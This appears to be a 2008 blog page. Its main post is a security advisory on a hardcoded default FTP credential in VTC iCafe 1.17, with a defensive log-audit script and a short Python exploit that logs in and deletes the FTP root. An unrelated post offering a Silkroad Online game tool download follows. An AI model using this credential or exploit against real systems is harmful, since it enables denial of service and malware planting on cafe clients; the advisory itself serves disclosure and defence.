BMSA200808 - Insecure default FTP password in VTC iCafe

Title:    Insecure default FTP password in VTC iCafe
Severity:    Critical
Reporter:    Blue Moon Consulting
Products:    VTC iCafe 1.17
Fixed in:    –

Description

VTC iCafe is an internet cafe management application. It ships with a hardcoded, insecure default FTP credential (username VTCIntecom, password VTCIntecom). The FTP server listens on port 6655 and distributes update files to the clients. A malicious user who knows this credential could a) cause a denial of service on the clients by removing the FTP root directory, or b) place malware such as viruses or trojans on the clients by replacing the update files.
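The two abuse cases above can be spotted in the update server's command log. The following is an added example, not part of the advisory or of the iCafe product: it flags write or delete commands issued under the shared VTCIntecom account, requests arriving from outside the cafe LAN, and control bytes in a command argument. The log format, the 10.0.0.0/24 LAN range and the sample lines are constructed assumptions for this example.

```python
import ipaddress
import re

# From the advisory: VTC iCafe 1.17 ships this default FTP account for its update server.
DEFAULT_FTP_USER = "VTCIntecom"
# Commands a client needs to fetch updates; anything else under the default account is suspicious.
READ_ONLY_CMDS = {"USER", "PASS", "SYST", "TYPE", "PASV", "PORT", "CWD", "PWD",
                  "LIST", "NLST", "SIZE", "MDTM", "RETR", "NOOP", "QUIT"}
# Assumed cafe client LAN for this example; adjust to the deployment.
CAFE_LAN = ipaddress.ip_network("10.0.0.0/24")
# Constructed log format (not the real iCafe server format):
# "<timestamp> <client_ip> <user> <COMMAND> [argument]", control bytes escaped as \xNN.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")
CONTROL_RE = re.compile(r"\\x[0-9a-fA-F]{2}|[\x00-\x1f\x7f]")

def audit_line(line):
    """Return the reasons a log line is suspicious; an empty list means a normal update fetch."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return []
    ip, user, cmd, arg = m.group("ip", "user", "cmd", "arg")
    reasons = []
    if user == DEFAULT_FTP_USER and cmd not in READ_ONLY_CMDS:
        reasons.append("default-account-write")      # RMD/DELE/STOR under the shared default login
    try:
        outside = ipaddress.ip_address(ip) not in CAFE_LAN
    except ValueError:
        outside = True                               # unparsable source address: treat as unexpected
    if outside:
        reasons.append("source-outside-cafe-lan")    # the update port should only see cafe clients
    if arg and CONTROL_RE.search(arg):
        reasons.append("control-bytes-in-argument")  # e.g. the NUL byte in the advisory's RMD request
    return reasons

def audit_ftp_log(lines):
    """Collect (timestamp, ip, user, command, reasons) for every line that raises a reason."""
    findings = []
    for line in lines:
        reasons = audit_line(line)
        if reasons:
            m = LINE_RE.match(line.rstrip("\r\n"))
            findings.append((m.group("ts"), m.group("ip"), m.group("user"), m.group("cmd"), reasons))
    return findings

# Constructed sample log: a normal client update fetch, then the two abuse cases from the advisory.
SAMPLE_LOG = """\
2008-08-20T09:00:01 10.0.0.5 VTCIntecom RETR update/icafe_1.17.exe
2008-08-20T09:00:05 10.0.0.5 VTCIntecom QUIT
2008-08-20T09:15:42 192.168.50.9 VTCIntecom RMD \\x00
2008-08-20T09:16:10 10.0.0.7 VTCIntecom STOR update/icafe_1.17.exe
""".splitlines()
```

Run `audit_ftp_log(SAMPLE_LOG)` to get one finding per suspicious line; only the RETR/QUIT lines of a normal update fetch pass clean.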

Workaround

There is no workaround.

Fix

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure

Blue Moon Consulting follows RFPolicy v2.0 when notifying vendors.
Initial vendor contact:

  • August 12, 2008: Initial contact sent to support.icafe@vtc.vn

Vendor response:

Public disclosure:

  • August 20, 2008

Exploit code

import ftplib

# Connect to the iCafe update server (default port 6655) using the default credentials.
ftp = ftplib.FTP()
ftp.connect("localhost", 6655)
ftp.login("VTCIntecom", "VTCIntecom")
# RMD with a NUL byte as the argument removes the FTP root directory (denial of service case a).
ftp.sendcmd("RMD \x00")
ftp.quit()

Disclaimer

The information provided in this advisory is provided “as is” without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.



SROManager for SROVN

SROManager is a tool for Silkroad Online Vietnam. (view image for features)

Target: http://www.conduongtolua.com.vn/
Target Version: v1.036

Software version: v1.036p3
By: superkhung

More Information at GameVN Forum: http://forum.gamevn.com/showthread.php?t=484307

Here is the screenshot:

Click here to download: (UnRar password is !fuck0ff)

Download SROManager for SROVN Version 1.036p3


Rapidshare Links: http://rapidshare.com/files/133973281/sro.manager.1002010808.rar.html

----

Silkroad Online (also known as SRO; Korean: 실크로드 온라인) is a free massively multiplayer online role-playing game (MMORPG) created by the South Korean company Joymax, and was released for open beta testing on November 11, 2005. Much of the background of the game is based on the historical Silk Road. Unlike other MMORPGs, the game is centered on a triangular system of trading goods.

Silkroad Online is based on the history of trading in China along the Silk Road, a historical network of trade routes in Asia. The game attempts to reproduce the Silk Road on a much smaller scale, looking realistic while at the same time incorporating fantasy elements such as the use of special magical skills and abilities. One of the game’s most noted features is allowing players to choose between three different job roles after their character reaches level 20.

The game currently has a level cap of 100 in the Korean, Chinese and Japanese versions, and 90 in the Vietnamese and International versions.

The Korean, Chinese, and International versions of Silkroad Online have released both the Chinese and European races and classes with a large map that includes both Asian and central European locations, such as Constantinople and Hotan. Different races also have access to different character abilities. On July 24, 2007, Joymax released an expansion of the game entitled “Silkroad Online Legends I, Europe.” The expanded game includes European architecture, characters, clothing, and whole new abilities for the European in-game race to use.


Copyright (c) 2006-2008 The 4VN Group